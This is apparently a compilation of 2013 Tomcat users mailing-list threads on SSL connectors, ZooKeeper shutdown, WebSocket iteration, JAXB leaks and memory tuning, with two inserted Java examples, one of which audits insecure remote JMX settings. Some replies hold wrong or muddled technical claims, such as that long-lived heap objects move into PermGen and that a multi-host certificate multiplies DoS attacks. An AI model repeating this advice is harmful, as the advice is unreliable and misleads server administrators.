if you want JSSE Handshaking to be enabled on server, enable AprLifecycle Listener on server.xml, e.g.

    <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="on" />

Any WebServer (including Tomcat) has no knowledge of external HTML Servers around it
you should use netstat

    netstat -ab | grep 443

Tell us what you see
Martin

From: anigo...@cisco.com
To: users@tomcat.apache.org
Subject: RE: Customizing SSL in HttpClient
Date: Tue, 11 Jun 2013 06:29:05 +

-Original Message-
From: Anil Goyal -X (anigoyal - Aricent Technologies at Cisco)
Sent: Tuesday, June 11, 2013 11:23 AM
To: Tomcat Users List
Subject: RE: Customizing SSL in HttpClient

-Original Message-
From: Christopher Schultz [mailto:ch...@christopherschultz.net]
Sent: Monday, June 10, 2013 7:51 PM
To: Tomcat Users List
Subject: Re: Customizing SSL in HttpClient

Anil,

On 6/10/13 8:42 AM, Anil Goyal -X (anigoyal - Aricent Technologies at Cisco) wrote:
I am trying to create a http client and send a request to a certain port of a server using the code below:

    HttpClient client = new HttpClient();
    client.getHostConfiguration().setHost(address, portNumber, protocol);

Here portNumber that I am setting is 8444 (https port of tomcat). When I execute client.executemethod() and at the server side when I tried to retrieve request.getRequestURL(), I am getting the url with port 443, not 8444 which I set in client. Even request.getServerPort is giving 443, not 8444.

Is there any kind of port-forwarding or anything else going on?

The things are working fine for 8081 (http port of tomcat), i.e.

    HttpClient client = new HttpClient();
    client.getHostConfiguration().setHost(address, portNumber, protocol);

Here portNumber that I am setting is 8081 (https port of tomcat). When I execute client.executemethod() and at the server side when I tried to retrieve request.getRequestURL(), I am getting the url with port 8081 which I set in client. Even request.getServerPort is giving 8081.

Can you show us a bit more of the code? It's not clear from your client code that the port number is set correctly, and you only mentioned the server. Can you give us some of that, too?

Also, what do your Connector elements look like in server.xml?

-chris

- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Please consider the code flow as below:

    HttpClient client = new HttpClient();
    portNumber = secure ? LocalNetworkConstants.DEFAULT_HTTPS_PORT : LocalNetworkConstants.DEFAULT_HTTP_PORT;
    // DEFAULT_HTTPS_PORT=8444 and DEFAULT_HTTP_PORT=8081 define in LocalNetworkConstants.java
    LOG.debug("the value of https port is" + String.valueOf(portNumber));
    if (secure) { Protocol
RE: Illegal access: this web application instance has been stopped already and NoClassDefFoundError
I org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115)
Caused by: java.lang.ClassNotFoundException: org.apache.zookeeper.server.ZooTrace
MG> put zookeeper*.jar on CLASSPATH
    at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1711)
    at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556)
    ... 1 more

At the same time, the following is also in catalina.out:

INFO: Illegal access: this web application instance has been stopped already. Could not load org.apache.zookeeper.server.ZooTrace. The eventual following stack trace is caused by an error thrown for debugging purposes as well as to attempt to terminate the thread which caused the illegal access, and has no functional impact.
java.lang.IllegalStateException
    at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1597)
    at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556)
    at org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115)

I searched Google and the mailing list and couldn't find any solution, please help me.

Environment info:
JDK: 1.6.0_45
Tomcat: 7.0.40
Zookeeper: 3.4.5

Can you give us any more of the stack trace? It looks like this is happening during shutdown, but all the ServletContextListeners should complete before the WebappClassLoader starts shedding its loaded classes.

Are you explicitly shutting-down the ClientCnxn thread in a SCL's destroy() method? If not, you need to do that.

Sorry, I can't get any more of the stack trace. We wrapped the zookeeper client as a spring bean and invoked the method close of zookeeper in the destroy-method of the bean; in that method close, the zookeeper Send Thread was closed. When tomcat was shut down, Spring closed its container and the bean was destroyed, then the destroy-method of the bean was invoked. I am confused about why the Send Thread of Zookeeper seemed to exit slower than the WebappClassLoader shedding its loaded classes.

ps: details of zookeeper closing

org.apache.zookeeper.Zookeeper

    public synchronized void close() throws InterruptedException {
        if (!cnxn.getState().isAlive()) {
            if (LOG.isDebugEnabled()) {
                LOG.debug("Close called on already closed client");
            }
            return;
        }
        if (LOG.isDebugEnabled()) {
            LOG.debug("Closing session: 0x" + Long.toHexString(getSessionId()));
        }
        try {
            cnxn.close();
        } catch (IOException e) {
            if (LOG.isDebugEnabled()) {
                LOG.debug("Ignoring unexpected exception during close", e);
            }
        }
        LOG.info("Session: 0x" + Long.toHexString(getSessionId()) + " closed");
    }

--
org.apache.zookeeper.ClientCnxn

    public void close() throws IOException {
        if (LOG.isDebugEnabled()) {
            LOG.debug("Closing client for session: 0x" + Long.toHexString(getSessionId()));
        }
        try {
            RequestHeader h = new RequestHeader();
            h.setType(ZooDefs.OpCode.closeSession);
            submitRequest(h, null, null, null);
        } catch (InterruptedException e) {
            // ignore, close the send/event threads
        } finally {
            disconnect();
        }
    }

    public void disconnect() {
        if (LOG.isDebugEnabled()) {
            LOG.debug("Disconnecting client for session: 0x" + Long.toHexString(getSessionId()));
        }
        sendThread.close();
        eventThread.queueEventOfDeath();
    }

-
org.apache.zookeeper.ClientCnxn.SendThread

    void close() {
        state = States.CLOSED;
        clientCnxnSocket.wakeupCnxn();
    }

    @Override
    public void run() {
        clientCnxnSocket.introduce(this,sessionId);
        clientCnxnSocket.updateNow();
        clientCnxnSocket.updateLastSendAndHeard();
        int to;
        long lastPingRwServer = System.currentTimeMillis();
        while (state.isAlive()) {
            try {
                if (!clientCnxnSocket.isConnected()) {
                    if(!isFirstConnect){
                        try {
                            Thread.sleep(r.nextInt(1000));
                        } catch (InterruptedException e) {
                            LOG.warn("Unexpected exception", e);
                        }
                    }
                    // don't re-establish connection if we are closing
RE: WebSockets Thread Safety question
/java/util>javap Collections | grep synchronized
public static java.util.Collection synchronizedCollection(java.util.Collection);
static java.util.Collection synchronizedCollection(java.util.Collection, java.lang.Object);
public static java.util.Set synchronizedSet(java.util.Set);
static java.util.Set synchronizedSet(java.util.Set, java.lang.Object);
public static java.util.SortedSet synchronizedSortedSet(java.util.SortedSet);
public static java.util.List synchronizedList(java.util.List);
static java.util.List synchronizedList(java.util.List, java.lang.Object);
public static java.util.Map synchronizedMap(java.util.Map);
public static java.util.SortedMap synchronizedSortedMap(java.util.SortedMap);

use java.util.Collections.synchronizedList

Martin

From: ch...@derham.me.uk
Date: Mon, 3 Jun 2013 07:42:01 -0300
Subject: Re: WebSockets Thread Safety question
To: users@tomcat.apache.org

When I use the syntax from the samples in the onTextMessage() method, I get ConcurrentModificationException if I have more than one client sending data to the server at the same time:

    for(MyMessageInbound mmib: mmiList){
        CharBuffer buffer = CharBuffer.wrap(cb);
        mmib.myoutbound.writeTextMessage(buffer);
        mmib.myoutbound.flush();
    }

Changing it to the following works fine:

    for(int i = 0; i < mmiList.size(); i++) {
        MyMessageInbound mmib = mmiList.get(i);
        CharBuffer buffer = CharBuffer.wrap(cb);
        mmib.myoutbound.writeTextMessage(buffer);
        mmib.myoutbound.flush();
    }

However, this approach is not as efficient as to use an Iterator, unless I clone the mmiList Collection to iterate over it...

Can you explain where the inefficiency is?

Thanks
Chris
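The failure reported in the message above, reproduced deterministically as an added example (not code from the thread or from Tomcat): a for-each broadcast over a shared connection list breaks when a connection deregisters itself mid-loop, Collections.synchronizedList does not change that, and CopyOnWriteArrayList iterates over a snapshot. The Connection class and its fields are hypothetical stand-ins for the thread's MyMessageInbound.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.ConcurrentModificationException;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;

public class BroadcastDemo {

    /** Hypothetical stand-in for the thread's MyMessageInbound. */
    static final class Connection {
        final String name;
        final boolean dropped;            // constructed: this client has gone away
        final List<Connection> registry;  // shared list of open connections
        int received = 0;

        Connection(String name, boolean dropped, List<Connection> registry) {
            this.name = name;
            this.dropped = dropped;
            this.registry = registry;
        }

        /** A failed write deregisters the connection, as an onClose() callback would. */
        void write(String message) {
            if (dropped) {
                registry.remove(this);
            } else {
                received++;
            }
        }
    }

    /** Registers four constructed clients; the second one has dropped. */
    static void fill(List<Connection> registry) {
        registry.add(new Connection("a", false, registry));
        registry.add(new Connection("b", true, registry));
        registry.add(new Connection("c", false, registry));
        registry.add(new Connection("d", false, registry));
    }

    /** Broadcasts with the for-each form from the thread and reports what happened. */
    static String broadcast(List<Connection> registry) {
        fill(registry);
        // Private copy used only to count deliveries afterwards.
        List<Connection> all = new ArrayList<Connection>(registry);
        String outcome = "ok";
        try {
            for (Connection c : registry) {
                c.write("hello");
            }
        } catch (ConcurrentModificationException e) {
            // The list changed underneath the iterator; later clients got nothing.
            outcome = "ConcurrentModificationException";
        }
        int delivered = 0;
        for (Connection c : all) {
            delivered += c.received;
        }
        return outcome + ", delivered=" + delivered
                + ", still registered=" + registry.size();
    }

    public static void main(String[] args) {
        System.out.println("ArrayList:            "
                + broadcast(new ArrayList<Connection>()));
        // The wrapper locks each single call, but its iterator is not guarded.
        System.out.println("synchronizedList:     "
                + broadcast(Collections.synchronizedList(new ArrayList<Connection>())));
        // Iteration runs over an immutable snapshot; removal builds a new array.
        System.out.println("CopyOnWriteArrayList: "
                + broadcast(new CopyOnWriteArrayList<Connection>()));
    }
}
```

The same snapshot behaviour covers the multi-client case in the thread, where another request thread adds or removes a connection while a broadcast is in progress.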
RE: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator
Hi Jesse

you can configure your customised Jaxb factory implementor by implementing a jaxb.properties file with a javax.xml.bind.context.factory=value

    javax.xml.bind.context.factory=org.eclipse.persistence.jaxb.JAXBContextFactory

be aware with key=value, value is the name of the class that implements the createContext for Jaxb
http://docs.oracle.com/javaee/5/api/javax/xml/bind/JAXBContext.html

Martin

Date: Sun, 19 May 2013 12:39:12 -0400
Subject: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator
From: jie...@gmail.com
To: users@tomcat.apache.org

Greetings,

I am using Apache Tomcat 7.0.40, via IBM Java 7 SR2. I am seeing the following on Tomcat shutdown:

org.apache.catalina.loader.WebappClassLoader.checkThreadLocalMapForLeaks The web application [] created a ThreadLocal with key of type [com.sun.xml.bind.v2.runtime.Coordinator$1] (value [com.sun.xml.bind.v2.runtime.Coordinator$1@f9b00906]) and a value of type [java.lang.Object[]] (value [[Ljava.lang.Object;@3d8d9b93]) but failed to remove it when the web application was stopped. Threads are going to be renewed over time to try and avoid a probable memory leak.

When I inspect the libraries within the application I find:

$ grep com.sun.xml.bind.v2.runtime.Coordinator *
Binary file jaxb-impl-2.2.1.1.jar matches

Apache Maven dependency:tree shows that this is coming from Apache Wink (wink-common - wink-client).

Is this JAXB ThreadLocal something that Apache Tomcat ought to protect me from?

Thank you,
-Jesse
RE: getting the request that created the session
org.apache.catalina.valves.RemoteIPValve getRemoteIpHeader?

Martin

Date: Sat, 27 Apr 2013 23:08:31 +0200
Subject: getting the request that created the session
From: rosenberg.l...@gmail.com
To: users@tomcat.apache.org

Hi,

is there any possibility to get the first request from a session (or any request from a session) from the HttpSessionListener?

Background: I want to count sessions by top level domains. I'm doing it now in a combination of filter and listener. Filter for new sessions, putting a mark for already counted sessions, and listener for destroyed session. However, I would like to get rid of the Filter, if it's possible somehow. For that, I need to get the user's IP address somehow.

thanks in advance
Leon
RE: JSTL XML Basic Question
Jerry

You'll need core taglib and xml taglib, e.g.
http://www.tutorialspoint.com/jsp/jstl_xml_out_tag.htm

declaration:

    <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
    <%@ taglib prefix="x" uri="http://java.sun.com/jsp/jstl/xml" %>

use core taglib to set var:

    <c:set var="xmltext">
    <books>
      <book>
        <name>Padam History</name>
        <author>ZARA</author>
        <price>100</price>
      </book>
      <book>
        <name>Great Mistry</name>
        <author>NUHA</author>
        <price>2000</price>
      </book>
    </books>
    </c:set>

use xml taglib to set parse var:

    <x:parse xml="${xmltext}" var="output"/>

use xml taglib to set output the parsed text

    <x:out select="$output/books/book[1]/name" />

http://www.tutorialspoint.com/jsp/jstl_xml_out_tag.htm

Martin

Date: Sat, 20 Apr 2013 13:14:21 -0500
Subject: JSTL XML Basic Question
From: 2ndgenfi...@gmail.com
To: users@tomcat.apache.org

I have been searching for several hours for a basic JSTL answer with no luck. From what I can tell, JSTL is under the umbrella of Tomcat. Hopefully someone can help me out.

I simply want to use an existing already-parsed DOM (org.w3c.dom.Document variable) with JSTL XML tags. In other words, I want to skip the x:parse step and just tell x:out and all of the other x tags to pull data from my pre-existing pre-parsed DOM:

    Document myDOM; // already built by another part of the code

I understand basic xpath stuff. But I'm not sure how to tell it to use a standard local java variable for the DOM. I've tried

    <x:out select="$myDOM/a/b"/>

and

    <x:out select="${myDOM}/a/b"/>

Both give me errors that seem to say it doesn't find a DOM. Every example I can find always assumes I want to start with a true non-parsed XML document.

I'm sure I'm missing something obvious. But can someone please help me out with the correct syntax?

Thanks.
Jerry
RE: RE : Tomcat 6.0.35 Crashed again
you need to do take a look at the loaded JSF webapps and find outwho is acquiring a resource and not closing the resource who is acquiring large amounts of heap and not releasingbe aware any reference to an any object in another class gives the class the right to be placed into PermGenHibernate with cglib proxies are notorious memory hogs awatch your PermGen get pegged when Hibernate and cglib proxies are loadedStatics are another set of culprits of of heap usage Remember all long lived heap objects are eventually placed into Permgen Find the tools to track eden heap, tenured heap and PermGen http://www.integratingstuff.com/2011/07/24/understanding-and-avoiding-the-java-permgen-space-error/ get familiar with taking heap dumps with jmap and analyzing with jhathttp://javarevisited.blogspot.com/2011/05/java-heap-space-memory-size-jvm.html Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. 
Date: Thu, 11 Apr 2013 11:40:46 -0400
Subject: Re: RE : Tomcat 6.0.35 Crashed again
From: smithh032...@gmail.com
To: users@tomcat.apache.org

On Thu, Apr 11, 2013 at 10:41 AM, Mark H. Wood mw...@iupui.edu wrote:

Really, no one else can tell you what settings to use. The best we can hope for is some accepted rules of thumb *as starting points* for further tuning.

+1 to Dan, Neven, and Mark's responses. Please consider-or-do 'everything' that they mentioned/recommended.

I did want to share my java settings for my currently-considered-a-low-scale JSF web app running on Windows Server 2008 R2 64bit server with 32GB RAM.

    -XX:HeapDumpPath=D:\apache-tomee-plus-1.6.0-SNAPSHOT\temp
    -XX:+HeapDumpOnOutOfMemoryError
    -Djava.awt.headless=true
    -Dcom.sun.management.jmxremote.port=422
    -Dcom.sun.management.jmxremote.ssl=false
    -Dcom.sun.management.jmxremote.authenticate=false
    -Xms1024m
    -Xmx1024m
    -XX:MaxPermSize=384m
    -XX:+UseTLAB
    -XX:+UseConcMarkSweepGC
    -XX:+CMSClassUnloadingEnabled

I am very pleased with the GC performance of my app, and I do like to monitor the performance of the app via JMX remote connection via Java Visual VM.

My app runs between 200m to 500m, but I am keeping Xms/Xmx=1024m just to see if I ever get an OOME; so far, so good (never experienced an OOME), but recently, I did experience some unexpected/unwanted behavior with one of my @Schedule processes which was attempting to sync some data from database to/with Google Calendar, and Google Calendar service returned Google Calendar error 503, and I recognized that the memory got up to 500m, and the Google Calendar error 503 did not resolve itself over an hour (@Schedule executes every 2 to 4 minutes, if error occurs, then data is appended to the queue for later retry attempt). I have never seen that behavior and I don't know if I will see it again; I wish I would have done a 'heap dump' instead of a 'stop' tomee/tomcat.

Every day, I listen and read these questions/responses on tomcat list, and I can't believe that I forgot to do a 'heap dump'. :(

Also, please note that I occasionally stop-deploy-and-start tomee/tomcat almost-on-a-daily-basis to deploy new app-or-configuration-or-library updates; also, the app or tomee (or tomcat) seem to accumulate threadlocals over time, and if uptime is 1 day, then I 'think' I see that memory is not released, and I think eventually as uptime increases, then the app/tomee/tomcat will result in OOME. :)

At any rate, hope this helps.

Howard
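The settings shared above open a remote JMX port with ssl=false and authenticate=false. As an added example (not code from the thread or from Tomcat), the Java class below reads JVM arguments and reports remote-JMX options that switch off authentication or TLS; the class name and the file paths in HARDENED are placeholders.

```java
import java.lang.management.ManagementFactory;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

/** Flags JVM arguments that expose the remote JMX connector without protection. */
public class JmxRemoteAudit {

    private static final String PREFIX = "-Dcom.sun.management.jmxremote";

    // The three JMX flags as posted in the thread.
    static final List<String> POSTED = Arrays.asList(
        "-Dcom.sun.management.jmxremote.port=422",
        "-Dcom.sun.management.jmxremote.ssl=false",
        "-Dcom.sun.management.jmxremote.authenticate=false");

    // Same port with both protections on. File paths are placeholders;
    // ssl=true also needs a keystore configured through javax.net.ssl.keyStore.
    static final List<String> HARDENED = Arrays.asList(
        "-Dcom.sun.management.jmxremote.port=422",
        "-Dcom.sun.management.jmxremote.ssl=true",
        "-Dcom.sun.management.jmxremote.authenticate=true",
        "-Dcom.sun.management.jmxremote.password.file=/path/to/jmxremote.password",
        "-Dcom.sun.management.jmxremote.access.file=/path/to/jmxremote.access");

    /** Collects -Dcom.sun.management.jmxremote[.key][=value]; a later flag wins. */
    static Map<String, String> jmxOptions(List<String> jvmArgs) {
        Map<String, String> opts = new LinkedHashMap<String, String>();
        for (String arg : jvmArgs) {
            if (!arg.startsWith(PREFIX)) continue;
            String rest = arg.substring(PREFIX.length());   // "", "=x" or ".key=x"
            if (!rest.isEmpty() && rest.charAt(0) != '.' && rest.charAt(0) != '=') continue;
            int eq = rest.indexOf('=');
            String key = eq < 0 ? rest : rest.substring(0, eq);
            String value = eq < 0 ? "" : rest.substring(eq + 1).trim();
            opts.put(key.startsWith(".") ? key.substring(1) : key, value);
        }
        return opts;
    }

    /** Returns one finding per weakened setting; empty when nothing is exposed. */
    static List<String> audit(List<String> jvmArgs) {
        Map<String, String> o = jmxOptions(jvmArgs);
        List<String> findings = new ArrayList<String>();
        String port = o.get("port");
        if (port == null) return findings;   // no remote connector requested
        // Both settings default to true once a port is set, so only an
        // explicit "false" weakens them.
        if ("false".equalsIgnoreCase(o.get("authenticate"))) {
            findings.add("port " + port + ": authenticate=false, any client that "
                + "reaches the port can invoke MBean operations without credentials");
        }
        if ("false".equalsIgnoreCase(o.get("ssl"))) {
            findings.add("port " + port + ": ssl=false, JMX traffic (and any "
                + "credentials) crosses the network in clear text");
        }
        return findings;
    }

    static void report(String label, List<String> jvmArgs) {
        List<String> findings = audit(jvmArgs);
        System.out.println(label + ": " + (findings.isEmpty() ? "no findings" : ""));
        for (String f : findings) System.out.println("  " + f);
    }

    public static void main(String[] args) {
        report("flags as posted", POSTED);
        report("hardened flags", HARDENED);
        // The arguments the current JVM was actually started with.
        report("this JVM", ManagementFactory.getRuntimeMXBean().getInputArguments());
    }
}
```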
RE: Better SSL connector setup
Identification of keys and supported ciphers is important for Key Exchange.
But before that happens, the certificate's attributes are the only means by which the CA-Authority can verify the name in the cert.
The certificate attributes should contain
1) 1 and only 1 Hostname to contact
2) Identification information from a DN in LDAP or a suitably unique Name Service Server (ADS) allowing verification of client to a 'Name Service'
http://docs.oracle.com/cd/E19575-01/820-3885/gimog/index.html

Allowing your cert to authenticate to n hosts invites 2n as many potential DOS attacks.
Not requiring DN would negate the CA-Authority ability to verify DN CN == SSL-Host.
Think of online banking and clients need to circumvent forged sites as 'The official bank site' to send your money.
If you are FE with Apache you will want to configure in mod-ssl http://www.modssl.org/

Martin

Date: Sun, 7 Apr 2013 11:40:24 -0700
From: its_toas...@yahoo.com
To: users@tomcat.apache.org
Subject: Re: Better SSL connector setup

Some notes from October 2011 referenced below:

On 4/7/2013 8:47 AM, Christopher Schultz wrote:

Kevin,

On 4/6/13 10:10 PM, Kevin Jenkins wrote:

I have a server that has two hosts: First: http://masterserver2.raknet.com/ Second (using alias) https://lobby3.raknet.com https://milestone.lobby3.raknet.com:444/ https://milestone.lobby3.raknet.com:444/ I would like have access be on these specific URLS.
Right now you can use untrusted URLs, such as https://masterserver2.raknet.com/ https://milestone.lobby3.raknet.com/ Additionally, I would like to access milestone.lobby3.raknet.com on port 443 rather than 444 (so that 443 does not display a warning like it does now). I setup two connectors because I did not know how else to specify there are two ssl certificate files If you want two separate hostnames served under HTTPS and you: a. Don't have a wildcard or other special type of certificate or b. Don't have Server Name Indication capabilities From the list archives: http://mail-archives.apache.org/mod_mbox/tomcat-users/201110.mbox/%3c1318710394.66976.yahoomail...@web125511.mail.ne1.yahoo.com%3E Wildcard certificates would work in this case because the hosts are part of the same domain. SNI is apparently client-side only for Java. ...then you will need to configure a Connector for each hostname on a separate interface/port combination with separate certificates. The easiest way to do this is to set up a second interface with a separate IP address. This is usually trivial to do, and it doesn't really interfere with networking on the server. Just create a second interface with a second IP address, map DNS properly, and then set up your web server to bind specifically to the second IP address for the second hostname's SSL virtual host. In a Tomcat-only setup this is the way to go. Secondary or virtual IP addresses are easy to set up. Your Connectors look just fine (other than the use of port 444, of course). Once you have a second interface/IP, you'll want to use the address attribute of the Connector to choose the interface to listen on. I would choose one Connector to listen on *all* interfaces to be a catch-all in case your IP address(es) change(s) and you forget to re-configure everything: a security warning due to a mismatched-host is better for users than an unreachable host. 
-chris

The other solution is to front the Tomcat systems with an Apache HTTPD server and use named virtual hosts in SSL. Apparently the configuration checking routine throws a warning on startup, but the actual configuration works (on Apache HTTPD 2.2, I've not tried 2.4).

. . . . just my two cents.
/mde/
RE: IIS and Tomcat workers groups
The only way I know how is to have IIS route all requests to a Proxy (such as Squid)
http://wiki.squid-cache.org/Features/Redirectors
The Proxy Server (Squid) can redirect to LB all requests for GroupNode1 and GroupNode2

Warm regards from the USA,
Martin
__
Please do not alter or interrupt this communication. Thank you.

Date: Thu, 4 Apr 2013 10:14:50 +0100
From: miguel_3_gonza...@yahoo.es
Subject: IIS and Tomcat workers groups
To: users@tomcat.apache.org

Dear all,

We currently have an IIS 6 fronting several Tomcat 6 containers with a list of workers for each redirection we want to forward from IIS to each tomcat.

We are thinking of migrating to IIS 7.5 and Tomcat 7. Also we would like that two of the nodes share the same redirection and so we can balance the load to two servers instead of having one server.

Is it possible that two of the nodes are balanced in a group while the other nodes are stand-alone?

Many thanks
Miguel
RE: Analyzing Connection Pool Errors/Leaks
Never met GK but there are a few things that he needs to implement to make Hibernate Production-Ready
1) Deprecate the home-made bag classes ..collection classes have been out for the better part of 5 years ..and force the op to upgrade their JDK to AT LEAST 1.5 to use ArrayListBagClass..Bag classes add unnecessary load and overhead and any overhead is bad
2) Close your LRU ResultSets
3) Close your LRU StatementHandles
4) Close your LRU Cursors
5) Close your LRU Connections
6) Allow hinting..I don't want Any Hibernate query to do FTS when there is a perfectly good index waiting to be used

Why the rant: 1 1/2 years ago I visited a high-profile client that was processing a million transactions a day and Hibernate was mucking the process so intrusively the client said rewrite 1000_ Hibernate calls to straight queries
to quote a Cambridge Maven..Hibernate is more trouble than it's worth

My 2 cents
Martin Gainty
Subject: Re: Analyzing Connection Pool Errors/Leaks From: dmik...@vmware.com Date: Mon, 1 Apr 2013 17:11:50 -0400 To: users@tomcat.apache.org On Apr 1, 2013, at 4:18 PM, David Landis wrote: Thanks for the response, see my comments inline below. On Mon, Apr 1, 2013 at 3:49 PM, Daniel Mikusa dmik...@vmware.com wrote: On Apr 1, 2013, at 3:31 PM, David Landis wrote: Hi guys, When running a performance test on my system it starts fine, but after a while I start getting errors in my application log such as (see the bottom for full stack trace): 2013-03-29 16:38:54,778 ERROR [org.hibernate.engine.jdbc.spi.SqlExceptionHelper] - [SimpleAsyncTaskExecutor-12842] - [SimpleAsyncTaskExecutor-12842] Timeout: Pool empty. Unable to fetch a connection in 30 seconds, none available[size:80; busy:0; idle:0; lastwait:3]. This means you have no connections in your pool and it's unable to create a new connection to your database. OK, I'll have to investigate the DB setting more thoroughly. The maximum sessions and processes in Oracle are higher than we were using for the test though (several hundred). Questions: 1.) I'm a little confused about what it means if no connections are available and yet none are busy nor idle. What are the other available states? The pool is empty. Further more the error above means that it can't create a new connection either. Maybe your network failed? or the DB kicked off all your application's connections? Actually Oracle was showing 70+ inactive sessions for my app even though the connection pool was showing empty. Possible you are hitting a bug. You might also want to try an upgrade of Tomcat. You're a couple versions back at 7.0.32. You can see what was fixed by searching for jdbc-pool in the ChangeLog. https://tomcat.apache.org/tomcat-7.0-doc/changelog.html Dan Were you ever able to get a connection to the DB? If you restart Tomcat, can you get connections to the DB again? 
Yes, restarting Tomcat results in a fresh pool of DB connections and the 70+ inactive sessions on the DB side are gone and replaced by 10 which is the initial size of the pool. Also, are there any limits on your DB user's account that might cause problems with your performance tests? Not that I know of, but I'll look further. I was expecting problems with the perf test eventually b/c it was set to simulate a couple hundred users and I only maxActive set to 80. That is fine. I'm more concerned with why the connection pool didn't eventually recover. 2.) My other point of confusion is that assuming there is a connection leak in the application, shouldn't setting removeAbandoned=true cause the DB connections to eventually be recovered? Yes. What I am seeing is that even after a couple days of no application usage now I'm still getting
RE: OCSP with TOMCAT 7
so you want Tomcat7 to act as an OCSP Responder?
download and install ocsp daemon ..this is not trivial as you will need to be able to communicate to a working LDAP server
http://www.openca.org/projects/ocspd/
configure your servlet to serve its requests to ocsp-daemon calls..
configure the servlet to serve the response with the results from the ocsp-daemon

Please explain why you want to FE the ocspd request instead of calling the daemon directly?

Martin

Date: Thu, 21 Mar 2013 10:08:08 +0100
From: a...@ice-sa.com
To: users@tomcat.apache.org
Subject: Re: OCSP with TOMCAT 7

Amit A wrote:

Could not find anything archived on this topic. Search query: http://marc.info/?l=tomcat-user&w=2&r=1&s=tomcat+ocsp&q=t Further pointers please?

15/03/2013, subject Standard or OCSP Native Lib?, Nick Williams ?

On Wed, Mar 20, 2013 at 4:23 PM, André Warnier a...@ice-sa.com wrote:

Amit A wrote:

I need to enable OCSP on my application which is running Tomcat 7.0.29. Looked up the documentation but did not find quite much: http://tomcat.apache.org/tomcat-7.0-doc/ssl-howto.html

1. Is OCSP with just tomcat actually possible? Do we need an external module/software?
2. Has anyone implemented/Configured OCSP with Tomcat? I am looking for the nitty gritties here.

Search the list archives. There was a question/response about this exact subject just a few days ago.
RE: SSL Best Practices
1) Have you ever tried to coerce IE to accept a self-signed cert
2) if you purchase a pfx with a self-signed certificate sold to you by chris_is_a_hacker.com for 1.00 then who do you think can break it

The cert allows browser to contact the site's SSL connector..by presenting credentials usually from a Name Server such as ADS or LDAP
the real work involves breaking the algorithm implemented by the key in order to establish Key exchange on a SSLv2 transport
I sincerely doubt even chris_is_a-hacker can break any of the RSA algorithms implemented by the key inside a verisign.pfx

'Nuf Said
Martin
From: jeffrey.har...@mantech.com To: users@tomcat.apache.org; ch...@derham.me.uk Date: Tue, 19 Mar 2013 06:04:52 -0400 Subject: RE: SSL Best Practices -Original Message- From: cjder...@gmail.com [mailto:cjder...@gmail.com] On Behalf Of chris derham Sent: Tuesday, March 19, 2013 1:58 AM To: Tomcat Users List Subject: Re: SSL Best Practices If the system is only for testing, or communicates with a limited number of systems (i.e., it is a firewalled backend system that only communicates with a front-end system), then again, a self-signed certificate would be fine. +1 I do agree that if this is a public facing system, or one in an organization with a large number of users that does not have its own CA infrastructure, then a commercial certificate would be the best choice. Commercial certificate authorities are actively targeted by hackers, and when they are broken into, the trust each os has configured of such certificates can cause issues. The recent google ssl certificate issue shows what happens when things go wrong. If users will access the site via a browser, then the browser warning will confuse them/make them used to ignoring security warnings. For applications communicating with each other, a self signed certificate will actually be more secure than a certificate authority issued certificate - assuming you trust your internal security more than you trust that of a commercial certificate authority. It all depends on what the certificate will be used for. Chris What you say is all true, but if the public is accessing the site, there is no real alternative to a commercial certificate, because there will be no way to ascertain the trust of the site at all, and as you say users will be confused by the browser warnings. Unfortunately, the security of the Internet is dependent on a relatively handful of commercial certificate authorities, several of whom have either been hacked, or who have not properly vetted requesters for certificates. 
Jeffrey Harris
RE: Upgrading Tomcat in the customer base
Patrick

if client and tc-server are on same domain..how about implementing Windows Authentication in TC? When client authenticates to the Domain all of the TC shares are restored (including TC share)
http://tomcat.apache.org/tomcat-7.0-doc/windows-auth-howto.html

HTH
Martin
__
..place disclaimer here...

From: pflah...@rampageinc.com
To: users@tomcat.apache.org
Subject: Upgrading Tomcat in the customer base
Date: Tue, 19 Mar 2013 15:24:07 -0400

Hi,

We deploy tomcat in our own folder (c:\rsi_tc\tomcat) on a Windows machine as a service. We use the service.bat to install as a service. Historically to update tomcat we would remove the current version and install the new version. There is a rub in all this, which is that we have to change the service login to be an account that can access files from a network share. Therefore when we upgrade tomcat, we remove the current version and install the new version and then someone ( the customer :-( ) has to go into the service and change the service login back to the account that will give them access to the network share.

I'm looking for a way (if possible) to avoid having the customer change the service login. I'm looking for suggestions to make this easier and have the following questions about whether some of my thoughts to make it easier are safe.

1. Can I *not* uninstall the service and just replace the folder structure on the file system with the new version? I have tried it and it seems to work but question whether or not it is safe. I know if a major version changes I cannot do this as the service calls tomcat6.exe vs tomcat7.exe for instance and therefore would have to do the complete uninstall/install.

